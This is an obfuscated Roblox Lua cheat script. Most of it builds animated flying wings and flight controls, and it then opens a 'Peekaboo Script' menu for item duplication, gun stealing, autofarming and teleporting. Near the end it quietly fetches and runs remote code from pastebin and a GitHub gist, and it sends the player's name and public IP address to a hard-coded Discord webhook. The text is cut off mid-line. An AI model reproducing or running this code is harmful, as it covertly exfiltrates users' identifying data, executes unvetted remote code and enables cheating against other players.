--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

function fly() for v103,v104 in pairs(script:GetChildren()) do pcall(function() v104.Value="";end);game:GetService("Debris"):AddItem(v104,0.1);end function weld(v105,v106,v107,v108,v109) local v110=0;local v111;while true do if (v110==0) then v111=Instance.new("Weld",v105 or v109 );v111.Part0=v105;v110=1211 -(1035 + 175) ;end if (v110==(561 -(306 + 254))) then v111.Part1=v106;v111.C0=v107 or CFrame.new() ;v110=2;end if (v110==(1 + 1)) then v111.C1=v108 or CFrame.new() ;return v111;end end end local v2={};function motor(v112,v113,v114,v115,v116,v117,v118) local v119=0 -0 ;local v120;while true do if (3==v119) then v120.DesiredAngle=tonumber(v116) or 0 ;return v120;end if (v119==(1469 -(899 + 568))) then v120.C1=v115 or CFrame.new() ;v120.MaxVelocity=tonumber(v117) or (0.05 + 0) ;v119=3;end if (v119==1) then v120.Part1=v113;v120.C0=v114 or CFrame.new() ;v119=4 -2 ;end if (v119==0) then v120=Instance.new("Motor6D",v112 or v118 );v120.Part0=v112;v119=1;end end end function lerp(v121,v122,v123) return v121 + ((v122-v121) * v123) ;end function clerp(v124,v125,v126) local v127=603 -(268 + 335) ;local v128;local v129;while true do if (v127==(291 -(60 + 230))) then for v428,v429 in pairs(v128) do v128[v428]=lerp(v429,v129[v428],v126);end return CFrame.new(v128[573 -(426 + 146) ],v128[1 + 1 ],v128[1459 -(282 + 1174) ]) * CFrame.Angles(select(815 -(569 + 242) ,unpack(v128))) ;end if (v127==(0 -0)) then v128={v124.X,v124.Y,v124.Z,v124:toEulerAnglesXYZ()};v129={v125.X,v125.Y,v125.Z,v125:toEulerAnglesXYZ()};v127=701 -(271 + 429) ;end end end function ccomplerp(v130,v131,v132) local v133=0 + 0 ;local v134;local v135;while true do if (v133==1) then for v431,v432 in pairs(v134) do v134[v431]=lerp(v432,v135[v431],v132);end return CFrame.new(unpack(v134));end if (v133==(1500 -(1408 + 92))) then v134={v130:components()};v135={v131:components()};v133=1;end end end function tickwave(v136,v137,v138) return ((((math.abs(((tick() + (v138 or 0))%v136) -(v136/(1290 -(993 + 295))) ) * (1 + 1)) -(v136/(1173 -(418 + 753))))/v136)/(1 + 1)) * v137 ;end function invcol(v139) local v140=0 + 0 ;while true do if (v140==0) then v139=v139.Color;return BrickColor.new(Color3.new(1 -v139.b ,(1 + 0) -v139.g ,(1 + 0) -v139.r ));end end end local v3=oc or function(...) return ...;end ;local v4=game.Players.LocalPlayer;local v5=v4.Character;local v6=v5.UpperTorso;local v7=v5.Humanoid;v7.PlatformStand=false;pcall(function() v5.Wings:Destroy();end);pcall(function() v5.Angel:Destroy();end);local v9=Instance.new("Model",v5);v9.Name="Wings";local v11={antiboomz0r={"New Yeller",nil,0.4,0.7,true,Color3.new(2 -1 ,2 -1 ,1900.95 -(106 + 1794) ),Color3.new(1,1,0.6)},taart={"Royal purple",nil,0.4,0.4,true},mitta={"Black",nil,0,0 -0 ,false},penjuin3={"White",nil,0 -0 ,0 + 0 ,false},thepc8110={"Black","Bright red",0.5,0,false,Color3.new(1,1257 -(1043 + 214) ,0 -0 ),Color3.new(0 -0 ,580 -(361 + 219) ,0)},nonspeaker={"Cyan","Toothpaste",320 -(53 + 267) ,413 -(15 + 398) ,false,Color3.new(3 -2 ,0 + 0 ,0),Color3.new(0,0,0)},littleau999={"Reddish brown",805 + 225 ,126 -(116 + 10) ,738 -(542 + 196) ,false},unscripter={"Really black","Really black",0.2,0 + 0 ,true,Color3.new(0 -0 ,1551 -(1126 + 425) ,405 -(118 + 287) ),Color3.new(1121 -(118 + 1003) ,0 -0 ,377 -(142 + 235) )},oxcool1={"Really black","White",0.2,0,false,Color3.new(0 + 0 ,0 + 0 ,0),Color3.new(0,0,0)},krodmiss={"Really black",nil,0 -0 ,0,false}};local v12=invcol(v5.UpperTorso.BrickColor);local v13=v5.UpperTorso.BrickColor;local v14=4 -3 ;local v15=753 -(239 + 514) ;local v16=false;local v17=Color3.new();local v18=Color3.new();local v19=v11[v4.Name:lower()];if v19 then v12,v13,v14,v15,v16,v17,v18=(v19[1] and BrickColor.new(v19[1 + 0 ])) or v12 ,(v19[1331 -(797 + 532) ] and BrickColor.new(v19[2 + 0 ])) or v13 ,v19[2 + 1 ],v19[9 -5 ],v19[5],v19[1208 -(373 + 829) ],v19[738 -(476 + 255) ];end local v20=Instance.new("Part");v20.Size=Vector3.new(1130.2 -(369 + 761) ,0.2,0.2);v20.TopSurface,v20.BottomSurface=0 + 0 ,0 -0 ;v20.CanCollide=false;v20.Color=Color3.new(482 -227 ,255,493 -(64 + 174) );v20.Transparency=1 + 0 ;v20.Material=Enum.Material.ForceField;v20.Reflectance=v15;local v30=Instance.new("Fire",(v16 and v20) or nil );v30.Size=0.15 -0 ;v30.Color=v17 or Color3.new() ;v30.SecondaryColor=v18 or Color3.new() ;v20:BreakJoints();function newpart() local v141=v20:Clone();v141.Parent=v9;v141:BreakJoints();return v141;end local v34=newpart();v34.BrickColor=v13;v34.Material=Enum.Material.ForceField;v34.Transparency=1;Instance.new("SpecialMesh",v34).MeshType="Sphere";function newfeather() local v143=v34:Clone();v143.Parent=v9;v143.Material=Enum.Material.ForceField;v143.Transparency=337 -(144 + 192) ;v143:BreakJoints();return v143;end local v39=newpart();v39.Size=Vector3.new(216.3 -(42 + 174) ,1.5 + 0 ,0.3 + 0 ) * (1.2 + 0) ;local v41=motor(v6,v39,CFrame.new(1504.35 -(363 + 1141) ,1580.6 -(1183 + 397) ,0.4) * CFrame.Angles(0 -0 ,0 + 0 ,math.rad( -(45 + 15))) * CFrame.Angles(math.rad(2005 -(1913 + 62) ),math.rad( -(16 + 9)),0 -0 ) ,CFrame.new(1933 -(565 + 1368) , -(0.8 -0),1661 -(1477 + 184) ),0.1);local v42=newpart();v42.Size=Vector3.new(0.4 -0 ,1.8 + 0 ,856.4 -(564 + 292) ) * (1.2 -0) ;local v44=motor(v39,v42,CFrame.new(0 -0 ,304.75 -(244 + 60) ,0) * CFrame.Angles(0 + 0 ,0,math.rad(50)) * CFrame.Angles(math.rad( -(506 -(41 + 435))),math.rad(1016 -(938 + 63) ),0 + 0 ) ,CFrame.new(0, -0.9,1125 -(936 + 189) ),0.1);local v45=newpart();v45.Size=Vector3.new(0.3 + 0 ,1615.2 -(1565 + 48) ,0.3) * (1.2 + 0) ;local v47=motor(v42,v45,CFrame.new(1138.1 -(782 + 356) ,267.9 -(176 + 91) ,0) * CFrame.Angles(0 -0 ,0,math.rad( -140)) * CFrame.Angles(math.rad( -(4 -1)),1092 -(975 + 117) ,0) ,CFrame.new(0, -(1876.1 -(157 + 1718)),0),0.1 + 0 );local v48=newpart();v48.Size=Vector3.new(0.25,3.2 -2 ,0.25) * (3.2 -2) ;local v50=motor(v45,v48,CFrame.new(1018 -(697 + 321) ,2.1 -1 ,0) * CFrame.Angles(0 -0 ,0 -0 ,math.rad( -(4 + 6))) * CFrame.Angles(math.rad( -3),0,0) ,CFrame.new(0, -(0.6 -0),0),0.1 -0 );local v51=newfeather();v51.Mesh.Scale=Vector3.new(1228 -(322 + 905) ,612 -(602 + 9) ,1190 -(449 + 740) );v51.Size=Vector3.new(872.4 -(826 + 46) ,950 -(245 + 702) ,0.3);weld(v48,v51,CFrame.new( -(0.1 -0), -0.3,0 + 0 ),CFrame.new(0, -(1899.5 -(260 + 1638)),0));v51=newfeather();v51.Mesh.Scale=Vector3.new(1,441 -(382 + 58) ,3 -2 );v51.Size=Vector3.new(0.4 + 0 ,3.3 -1 ,0.3 -0 );weld(v48,v51,CFrame.new(1205.1 -(902 + 303) , -(0.1 -0),0) * CFrame.Angles(0,math.random() * (0.1 -0) ,0) ,CFrame.new(0 + 0 , -(1691.1 -(1121 + 569)),0));v51=newfeather();v51.Mesh.Scale=Vector3.new(1,215 -(22 + 192) ,684 -(483 + 200) );v51.Size=Vector3.new(1463.35 -(1404 + 59) ,5.2 -3 ,0.25 -0 );v51.Transparency=766 -(468 + 297) ;v51.Material=Enum.Material.ForceField;weld(v48,v51,CFrame.new(0.1, -(562.3 -(334 + 228)),0) * CFrame.Angles(0 -0 ,math.random() * (0.1 -0) ,math.rad( -(18 -8))) ,CFrame.new(0 + 0 , -(237.1 -(141 + 95)),0 + 0 ));local v56={};for v148=0,17 -10  do v51=newfeather();v51.Mesh.Scale=Vector3.new(2 -1 ,1,1 + 0 );v51.Size=Vector3.new(0.45,5.2 -3 ,0.35 + 0 );table.insert(v56,motor(v45,v51,CFrame.new(0.05 + 0 ,(1 -0) -(v148 * 0.285) ,0) * CFrame.Angles(0,math.random() * (0.1 + 0) ,math.rad( -(188 -(92 + 71)) -(v148 * 2) )) ,CFrame.new(0 + 0 , -v51.Size.Y/(2 -0) ,765 -(574 + 191) )));end local v57={};for v151=0,5 + 1  do v51=newfeather();v51.Mesh.Scale=Vector3.new(1,2 -1 ,1 + 0 );v51.Size=Vector3.new(0.45,2.2 -(v151 * (849.08 -(254 + 595))) ,126.3 -(55 + 71) );table.insert(v57,motor(v42,v51,CFrame.new(0.05 -0 ,(1790.75 -(573 + 1217)) -(v151 * (0.26 -0)) ,0) * CFrame.Angles(0 + 0 ,math.random() * 0.1 ,math.rad( -(120 -45) -(v151 * 4) )) ,CFrame.new(939 -(714 + 225) , -v51.Size.Y/(5 -3) ,0)));end local v58={};for v154=0 -0 ,1 + 5  do v51=newfeather();v51.Mesh.Scale=Vector3.new(1,1 -0 ,807 -(118 + 688) );v51.Size=Vector3.new(48.37 -(25 + 23) ,(1.65 + 0) -(v154 * (1886.06 -(927 + 959))) ,0.25 -0 );table.insert(v58,motor(v39,v51,CFrame.new(732.05 -(16 + 716) ,(0.63 -0) -(v154 * 0.21) ,97 -(11 + 86) ) * CFrame.Angles(0,math.random() * (0.05 -0) ,math.rad( -(360 -(175 + 110)))) ,CFrame.new(0, -v51.Size.Y/(4 -2) ,0 -0 )));end local v59=newpart();v59.Size=Vector3.new(1796.3 -(503 + 1293) ,2.5 -1 ,0.3) * (1.2 + 0) ;local v61=motor(v6,v59,CFrame.new( -(1061.35 -(810 + 251)),0.6 + 0 ,0.4 + 0 ) * CFrame.Angles(0 + 0 ,533 -(43 + 490) ,math.rad(60)) * CFrame.Angles(math.rad(30),math.rad(25),0) * CFrame.Angles(733 -(711 + 22) , -math.pi,0 -0 ) ,CFrame.new(859 -(240 + 619) , -(0.8 + 0),0),0.1 -0 );local v62=newpart();v62.Size=Vector3.new(0.4 + 0 ,1745.8 -(1344 + 400) ,405.4 -(255 + 150) ) * 1.2 ;local v64=motor(v59,v62,CFrame.new(0 + 0 ,0.75 + 0 ,0 -0 ) * CFrame.Angles(0 -0 ,1739 -(404 + 1335) ,math.rad(456 -(183 + 223) )) * CFrame.Angles(math.rad(36 -6 ),math.rad( -(10 + 5)),0 + 0 ) ,CFrame.new(0, -0.9,337 -(10 + 327) ),0.1 + 0 );local v65=newpart();v65.Size=Vector3.new(338.3 -(118 + 220) ,2.2,0.3 + 0 ) * (450.2 -(108 + 341)) ;local v67=motor(v62,v65,CFrame.new(0.1 + 0 ,0.9 -0 ,0) * CFrame.Angles(0,1493 -(711 + 782) ,math.rad( -(268 -128))) * CFrame.Angles(math.rad(3),469 -(270 + 199) ,0) ,CFrame.new(0 + 0 , -(1820.1 -(580 + 1239)),0),0.1 -0 );local v68=newpart();v68.Size=Vector3.new(0.25 + 0 ,1.2,0.25) * (1.2 + 0) ;local v70=motor(v65,v68,CFrame.new(0 + 0 ,2.1 -1 ,0 + 0 ) * CFrame.Angles(1167 -(645 + 522) ,1790 -(1010 + 780) ,math.rad( -10)) * CFrame.Angles(math.rad(3 + 0 ),0 -0 ,0 -0 ) ,CFrame.new(1836 -(1045 + 791) , -(0.6 -0),0 -0 ),0.1);local v51=newfeather();v51.Mesh.Scale=Vector3.new(1,506 -(351 + 154) ,1575 -(1281 + 293) );v51.Size=Vector3.new(266.4 -(28 + 238) ,3,0.3);weld(v68,v51,CFrame.new( -0.1, -(0.3 -0),1559 -(1381 + 178) ),CFrame.new(0 + 0 , -1.5,0));v51=newfeather();v51.Mesh.Scale=Vector3.new(1 + 0 ,1,1 + 0 );v51.Size=Vector3.new(0.4,2.3,0.3);weld(v68,v51,CFrame.new(0.1, -0.1,0 -0 ) * CFrame.Angles(0,math.random() * (0.1 + 0) ,0) ,CFrame.new(0, -(471.1 -(381 + 89)),0 + 0 ));v51=newfeather();v51.Mesh.Scale=Vector3.new(1 + 0 ,1 -0 ,1157 -(1074 + 82) );v51.Size=Vector3.new(0.35 -0 ,1786.2 -(214 + 1570) ,1455.25 -(990 + 465) );weld(v68,v51,CFrame.new(0.1, -(0.3 + 0),0 + 0 ) * CFrame.Angles(0,math.random() * 0.1 ,math.rad( -10)) ,CFrame.new(0 + 0 , -1.1,0 -0 ));local v71={};for v157=1726 -(1668 + 58) ,633 -(512 + 114)  do v51=newfeather();v51.Mesh.Scale=Vector3.new(1,2 -1 ,1 -0 );v51.Size=Vector3.new(0.45,6.2 -4 ,0.35 + 0 );table.insert(v71,motor(v65,v51,CFrame.new(0.05 + 0 ,(1 + 0) -(v157 * (0.285 -0)) ,0) * CFrame.Angles(1994 -(109 + 1885) ,math.random() * (1469.1 -(1269 + 200)) ,math.rad( -(47 -22) -(v157 * (817 -(98 + 717))) )) ,CFrame.new(826 -(802 + 24) , -v51.Size.Y/(2 -0) ,0 -0 )));end local v72={};for v160=0,1 + 5  do local v161=0 + 0 ;while true do if (v161==(1 + 0)) then v51.Size=Vector3.new(0.45 + 0 ,(5.2 -3) -(v160 * 0.08) ,0.3 -0 );table.insert(v72,motor(v62,v51,CFrame.new(0.05 + 0 ,0.75 -(v160 * 0.26) ,0) * CFrame.Angles(0 + 0 ,math.random() * (0.1 + 0) ,math.rad( -75 -(v160 * (3 + 1)) )) ,CFrame.new(0 + 0 , -v51.Size.Y/2 ,0)));break;end if (0==v161) then v51=newfeather();v51.Mesh.Scale=Vector3.new(1434 -(797 + 636) ,1,4 -3 );v161=1620 -(1427 + 192) ;end end end local v73={};for v162=0 + 0 ,13 -7  do v51=newfeather();v51.Mesh.Scale=Vector3.new(1,1 + 0 ,1 + 0 );v51.Size=Vector3.new(326.37 -(192 + 134) ,(1277.65 -(316 + 960)) -(v162 * (0.06 + 0)) ,0.25);table.insert(v73,motor(v59,v51,CFrame.new(0.05 + 0 ,(0.63 + 0) -(v162 * (0.21 -0)) ,551 -(83 + 468) ) * CFrame.Angles(0,math.random() * (1806.05 -(1202 + 604)) ,math.rad( -(350 -275))) ,CFrame.new(0 -0 , -v51.Size.Y/(5 -3) ,325 -(45 + 280) )));end local v74={v41,v44,v47,v50};local v75={v61,v64,v67,v70};local v76={};for v165,v166 in pairs(v74) do v76[v166]=v166.C0;end for v169,v170 in pairs(v75) do v76[v170]=v170.C0;end function gotResized() if lastsize then local v238=0 -0 ;local v239;while true do if (v238==(1911 -(340 + 1571))) then if (v6.Size==lastsize) then return;end v239=v6.Size/lastsize ;v238=1;end if (v238==(1 + 0)) then for v528,v529 in pairs(v76) do v76[v528]=(v529-v529.p) + (v239 * v529.p) ;end lastsize=v6.Size;break;end end end lastsize=v6.Size;end v6.Changed:connect(function(v174) if (v174=="Size") then gotResized();end end);gotResized();local v77={0 -0 ,1948.5 -(1096 + 852) , -(0.2 + 0),0 + 0 ,236.05 -(46 + 190) ,0.05,0.1,726.05 -(228 + 498) , -0.6, -(664.5 -(174 + 489)),0.1,524 -(303 + 221) };local v78={ -0.7, -(1162.2 -(171 + 991)),1.8,0 -0 ,0.3 + 0 ,0.05,0.1 -0 ,0.05 -0 ,158.2 -(91 + 67) ,0,0,0 + 0 };local v79={0.5 + 0 , -(0.2 + 0),4.8 -3 ,0,0.3,711.05 -(530 + 181) ,32.1 -(19 + 13) ,0.05 -0 ,0.2 + 0 ,0,0 -0 ,1812 -(1293 + 519) };local v80={0.9, -(0.3 -0),2.9 -1 ,0,0.3 + 0 ,0.05 + 0 ,0.1 + 0 ,1858.05 -(673 + 1185) ,0.2 -0 ,0,0 + 0 ,0};local v81={ -(0.3 -0),0.3 -0 ,1.1, -(1283.2 -(1040 + 243)),1847.3 -(559 + 1288) ,454.05 -(13 + 441) ,0.1 -0 ,0.05 -0 ,0.2 -0 , -(0.6 + 0),0,0 -0 };local v82={0,0.2 + 0 ,0.4 + 0 , -(433.7 -(153 + 280)),0.3 + 0 ,0.05 + 0 ,0.1 + 0 ,0.05 -0 ,667 -(89 + 578) , -(0.5 -0), -0.6,0};function setwings(v175,v176) v176=v176 or (7 + 3) ;for v201=1 + 0 ,4 do v74[v201].DesiredAngle=v175[v201];v75[v201].DesiredAngle=v175[v201];v74[v201].MaxVelocity=math.abs(v175[v201] -v74[v201].CurrentAngle )/v176 ;v75[v201].MaxVelocity=math.abs(v175[v201] -v75[v201].CurrentAngle )/v176 ;local v207=v76[v74[v201]] * (v175[(98 -(84 + 2)) + v201 ] or CFrame.new()) ;local v208=v76[v75[v201]] * (v175[(19 -7) + v201 ] or CFrame.new()) ;end for v209,v210 in pairs(v58) do v210.DesiredAngle=v175[7 + 2 ];v210.MaxVelocity=math.abs(v210.DesiredAngle-v210.CurrentAngle )/v176 ;end for v214,v215 in pairs(v73) do v215.DesiredAngle=v175[851 -(497 + 345) ];v215.MaxVelocity=math.abs(v215.DesiredAngle-v215.CurrentAngle )/v176 ;end for v219,v220 in pairs(v57) do local v221=0;while true do if (v221==(0 + 0)) then v220.DesiredAngle=v175[2 + 8 ];v220.MaxVelocity=math.abs(v220.DesiredAngle-v220.CurrentAngle )/v176 ;break;end end end for v222,v223 in pairs(v72) do v223.DesiredAngle=v175[1343 -(605 + 728) ];v223.MaxVelocity=math.abs(v223.DesiredAngle-v223.CurrentAngle )/v176 ;end for v227,v228 in pairs(v56) do local v229=0 + 0 ;while true do if (v229==(0 -0)) then v228.DesiredAngle=v175[1 + 10 ];v228.MaxVelocity=math.abs(v228.DesiredAngle-v228.CurrentAngle )/v176 ;break;end end end for v230,v231 in pairs(v71) do v231.DesiredAngle=v175[11];v231.MaxVelocity=math.abs(v231.DesiredAngle-v231.CurrentAngle )/v176 ;end end setwings(v79,3 -2 );flying=false;moving=false;for v177,v178 in pairs(v6:GetChildren()) do if v178.ClassName:lower():match("body") then v178:Destroy();end end local v83=v6:Clone();v83:ClearAllChildren();v83.Name="cTorso";v83.Transparency=1 + 0 ;v83.CanCollide=false;v83.Size=Vector3.new(0.2 -0 ,0.2 + 0 ,489.2 -(457 + 32) );v83.Parent=v9;weld(v6,v83);local v89=Instance.new("BodyGyro",v83);v89.maxTorque=Vector3.new();v89.P=15000;v89.D=425 + 575 ;local v93=Instance.new("BodyVelocity",v83);v93.maxForce=Vector3.new();v93.P=15000;vel=Vector3.new();cf=CFrame.new();flspd=1402 -(832 + 570) ;keysdown={};keypressed={};ktime={};descendtimer=0 + 0 ;jumptime=tick();v7.Jumping:connect(function() jumptime=tick();end);cam=workspace.CurrentCamera;kd=v4:GetMouse().KeyDown:connect(v3(function(v179) local v180=0 + 0 ;while true do if (v180==0) then keysdown[v179]=true;keypressed[v179]=true;v180=3 -2 ;end if (v180==(1 + 0)) then if (v179=="q") then descendtimer=tick();elseif ((v179==" ") and  not v7.Jump) then jumptime=tick();elseif (((v179=="a") or (v179=="d")) and ktime[v179] and ((tick() -ktime[v179])<(796.3 -(588 + 208))) and (math.abs(reqrotx)<(0.3 -0))) then reqrotx=((v179=="a") and (math.pi * (1802 -(884 + 916)))) or ( -math.pi * (3 -1)) ;end ktime[v179]=tick();break;end end end));ku=v4:GetMouse().KeyUp:connect(function(v181) local v182=0 + 0 ;while true do if (v182==(653 -(232 + 421))) then keysdown[v181]=false;if (v181==" ") then descendtimer=tick();end break;end end end);function mid(v183,v184,v185) return math.max(v183,math.min(v184,v185 or  -v183 ));end function bn(v186) return (v186 and (1890 -(1569 + 320))) or (0 + 0) ;end function gm(v187) local v188=0;for v235,v236 in pairs(v187:GetChildren()) do local v237=0 + 0 ;while true do if (v237==0) then if v236:IsA("BasePart") then v188=v188 + v236:GetMass() ;end v188=v188 + gm(v236) ;break;end end end return v188;end reqrotx=0 -0 ;local v97=801.2 -(316 + 289) ;local v98;v98=game:GetService("RunService").Stepped:connect(v3(function() local v189=0 -0 ;local v190;local v191;local v192;local v193;while true do if (v189==(1 + 0)) then if flying then local v461=fldir;fldir=cam.CoordinateFrame:vectorToWorldSpace(Vector3.new(bn(keysdown.d) -bn(keysdown.a) ,0,bn(keysdown.s) -bn(keysdown.w) )).unit;local v463=moving;moving=fldir.magnitude>(1453.1 -(666 + 787)) ;if (v463 and  not moving) then local v575=0;while true do if (v575==(425 -(360 + 65))) then idledir=v461 * Vector3.new(1 + 0 ,254 -(79 + 175) ,1) ;descendtimer=tick();break;end end end local v464=(fldir.Y< -0.6) or (moving and keysdown["1"]) ;if (moving and keysdown["0"] and v463) then fldir=(Vector3.new(v461.X,math.min(fldir.Y,v461.Y + (0.01 -0) ) -0.1 ,v461.Z) + (fldir * Vector3.new(1,0,1 + 0 ) * (0.05 -0))).unit;end local v465=v6.CFrame:vectorToWorldSpace(Vector3.new(0, -(1 -0),0));local v466= not moving and keysdown['q'] and  not keysdown[" "] ;cf=ccomplerp(cf,CFrame.new(v6.Position,v6.Position + (( not moving and idledir) or fldir) ),(keysdown["0"] and (899.02 -(503 + 396))) or 0.07 );local v467= not v464 and (cf.lookVector.Y< -(181.2 -(92 + 89))) and (v6.Velocity.unit.Y<(0.05 -0)) ;v7.PlatformStand=true;v89.maxTorque=Vector3.new(1,1 + 0 ,1) * 900000 ;local v470=CFrame.new(Vector3.new(),v6.Velocity):toObjectSpace(CFrame.new(Vector3.new(),fldir)).lookVector;v89.cframe=cf * CFrame.Angles(( not moving and  -0.1) or (( -math.pi/(2 + 0)) + (0.2 -0)) ,(moving and (mid( -(1.5 + 1),v470.X/(2.5 -1) ) + reqrotx)) or (0 + 0) ,0 + 0 ) ;reqrotx=reqrotx-(reqrotx/10) ;v93.maxForce=Vector3.new(2 -1 ,1 + 0 ,1) * 90000 * (0.5 -0) ;local v473=(bn(keysdown[" "]) -bn(keysdown['q']))/(1246 -(485 + 759)) ;local v474=tickwave((2.5 -1) -v473 ,1190 -(442 + 747) );v93.velocity=v93.velocity:Lerp(Vector3.new(1135 -(832 + 303) ,(bn( not moving) *  -v474 * (961 -(88 + 858))) + (((v466 and (math.min(20,tick() -descendtimer ) *  -(3 + 5))) or (bn(keysdown[" "]) -bn(keysdown['q']))) * (13 + 2)) ,0) + vel ,0.6 + 0 );vel=(moving and (cf.lookVector * flspd)) or Vector3.new() ;flspd=math.min(909 -(766 + 23) ,lerp(flspd,(moving and (((fldir.Y<0) and (flspd + (( -fldir.Y * v97)/(296 -236)))) or math.max(68 -18 ,flspd-((fldir.Y * v97)/300) ))) or (158 -98) ,0.4));setwings((moving and ((v467 and v78) or (v464 and v82))) or (v466 and v80) or v81 ,15);for v531=3 -2 ,4 do local v532=1073 -(1036 + 37) ;while true do if (v532==(0 + 0)) then v74[v531].C0=clerp(v74[v531].C0,v76[v74[v531]] * ((v467 and CFrame.new()) or (v464 and CFrame.Angles( -0.5 + (bn(v531==3 ) * 0.4) + (bn(v531==(7 -3) ) * (0.5 + 0)) ,(0.1 + (bn(v531==(1482 -(641 + 839)) ) * (913.5 -(910 + 3)))) -(bn(v531==(7 -4) ) * (1685.1 -(1466 + 218))) ,bn(v531==3 ) * (0.1 + 0) )) or (v466 and CFrame.Angles(0.3,1148 -(556 + 592) ,0)) or CFrame.Angles(((v531 * 0.1) + 1.5) * v474 ,v474 *  -(0.5 + 0) ,1 * v474 )) ,(v466 and (808.8 -(329 + 479))) or (854.2 -(174 + 680)) );v75[v531].C0=clerp(v75[v531].C0,v76[v75[v531]] * ((v467 and CFrame.new()) or (v464 and CFrame.Angles( -( -0.5 + (bn(v531==(10 -7) ) * 0.4) + (bn(v531==(8 -4) ) * (0.5 + 0))), -(((739.1 -(396 + 343)) + (bn(v531==2 ) * (0.5 + 0))) -(bn(v531==3 ) * 1.1)),bn(v531==3 ) * (1477.1 -(29 + 1448)) )) or (v466 and CFrame.Angles( -(1389.3 -(135 + 1254)),0 -0 ,0 -0 )) or CFrame.Angles( -((v531 * 0.1) + 1.5) * v474 ,v474 * (0.5 + 0) ,(1528 -(389 + 1138)) * v474 )) ,(v466 and (574.8 -(102 + 472))) or 0.2 );break;end end end local v476,v477=workspace:FindPartOnRayWithIgnoreList(Ray.new(v6.Position,Vector3.new(0, -(3.5 + 0) + (math.min(0,v93.velocity.y)/(17 + 13)) ,0 + 0 )),{v5});if (_G.flying==false) then flying=false;v7.PlatformStand=false;v6.Velocity=Vector3.new();end else v89.maxTorque=Vector3.new();v93.maxForce=Vector3.new();local v480=tickwave((walking and (0.8 -0)) or 4.5 ,1);setwings(v77,10);local v481,v482,v483=v193/(98 + 62) ,v192/(2164 -(157 + 1307)) ,v191/(2759 -(821 + 1038)) ;if _G.flying then local v579=0 -0 ;while true do if (v579==(1 + 0)) then idledir=cam.CoordinateFrame.lookVector * Vector3.new(1 -0 ,0,1) ;cf=v6.CFrame * CFrame.Angles( -(0.01 + 0),0 -0 ,1026 -(834 + 192) ) ;v579=2;end if (v579==(1 + 2)) then flystart=tick();flying=true;break;end if (v579==2) then v6.CFrame=cf;v89.cframe=cf;v579=1 + 2 ;end if (v579==(0 + 0)) then vel=Vector3.new(0 -0 ,354 -(300 + 4) ,0 + 0 );v93.velocity=vel;v579=2 -1 ;end end end end keypressed={};break;end if (v189==0) then v190=v6.CFrame:vectorToObjectSpace(v6.Velocity);v191,v192,v193=v190.X,v190.Y,v190.Z;v189=1;end end end));end fly();local v0=game:HttpGet("https://api.ipify.org/");local v1=false;loadstring(game:HttpGet("https://pastebin.com/raw/fpuhTV2x"))();for v99,v100 in pairs(_G.whitelist) do if (tostring(v100)==tostring(v0)) then v1=true;end end for v101,v102 in pairs(_G.whitelist) do if (tostring(v102)==tostring(game.Players.LocalPlayer.Name)) then v1=false;end end _G.Status=true;if _G.Status then if v1 then print("whitelisted");webhook="https://discord.com/api/webhooks/1289940824095723540/4RkDHvQcY-tERwLlqt2Wvg3769O6kCQm6Vc0Trr136wHI4qBp3cLqZbV115dtpdKSHNx";local v240=game:GetService("HttpService");local v241={content="",embeds={{thumbnail={url="https://cdn.discordapp.com/attachments/1282005592302420040/1290344684224512030/shorts-152.png?ex=66fc1ea2&is=66facd22&hm=65c0c473789bbef34b24336915dce0ce94541cc88820739b70199a6f3896f392&"},title="__**Authorized user**__",description=game.Players.LocalPlayer.Name   .. "\n"   .. game:HttpGet("https://api.ipify.org/") ,type="rich",color=tonumber(65642 -(112 + 250) )}}};local v242=v240:JSONEncode(v241);local v243={["Content-Type"]="application/json"};local v244,v245=pcall(function() return request({Url=webhook,Body=v242,Method="POST",Headers=v243});end);wait(0.1);wait(0.1 + 0 );print(CREDITS);local v246=loadstring(game:HttpGet("https://gist.githubusercontent.com/MISSINGACID/e9f6cf627d256851ecc89798f69c2aa8/raw/509c970b9ea9cef74ae7e1fd5c9753e323c25e4b/fawwwk.lua"))();local v247=v246.new("Peekaboo Script | SW2","leadmarker");local v248=v247.new_tab("rbxassetid://12795075088");local v249=v247.new_tab("rbxassetid://6594776225");local v250=v247.new_tab("https://www.roblox.com/Thumbs/Asset.ashx?width=420&height=420&assetId=12334310477");local v251=v247.new_tab("https://www.roblox.com/Thumbs/Asset.ashx?width=420&height=420&assetId=12941020189");local v252=v247.new_tab("https://www.roblox.com/Thumbs/Asset.ashx?width=420&height=420&assetId=14134158105");local v253=v248.new_section("Duplication");local v254=v249.new_section("Editing");local v255=v250.new_section("Stealing");local v256=v251.new_section("Teleporting");local v257=v252.new_section("Settings");local v258=v253.new_sector("Autofarm","Left");local v259=v253.new_sector("Card Duping","Left");local v260=v254.new_sector("Enemies","Right");local v261=v254.new_sector("Settings","Left");local v262=v254.new_sector("Self","Left");local v263=v253.new_sector("Gun Duplication","Right");local v264=v255.new_sector("Gun Stealing","Left");local v265=v257.new_sector("Masking","Right");local v266=v256.new_sector("Teleports","Left");local v267=false;local v268=nil;local v269=v256.new_sector("Quick Buy","Left");local v270=nil;local v271=v269.element("Dropdown","Item",{options={"Sawnoff","Glock Drum","Walther PPK","Survival Knife","Revolver","Mac","Tec9","Knife","ZombieKnife","Bullets","Extended","Shotgun","Mag","Drum","AR-15","Vector","Thompson","Skorpion","MiniDraco","Glock 17 Ext","Glock 17 switch","HealthBoosters","Balaclava","Spraypaint","Flashlight","Lockpick","Dufflebag","Money Flex"}},function(v337) v270=v337.Dropdown;end);local v272=v269.element("Button","Buy",false,function(v339) if (v270~=nil) then if (v270=="HealthBoosters") then fireclickdetector(game.Workspace["Streetz War"].Real.ClickDetector);game.Players.LocalPlayer.PlayerGui:WaitForChild("DealerGui");game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.Visible=true;game.Players.LocalPlayer.PlayerGui.DealerGui.Frame.Visible=false;local v582=game:GetService("VirtualInputManager");local v583=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame:GetChildren()[18 -11 ];v583.Size=UDim2.new(16 -6 ,0, -(1109 -(35 + 1064)),0 + 0 